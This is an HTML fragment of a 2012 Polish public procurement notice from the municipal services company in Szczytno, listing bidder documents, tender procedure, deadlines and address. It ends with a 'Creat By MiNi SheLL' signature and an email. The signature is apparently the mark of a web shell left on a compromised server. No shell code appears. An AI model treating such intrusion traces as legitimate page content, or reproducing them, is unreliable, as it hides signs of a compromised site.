<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wpłacenia wadium zgodnie z pkt VIII SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zgk.szczytno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej w Szczytnie, ul. Polska 38, 12-100 Szczytno, pokój nr 1, godz. 7:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 09:00, miejsce: Zakład Gospodarki Komunalnej w Szczytnie, ul. Polska 38, 12 - 100 Szczytno, pokój nr 3 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com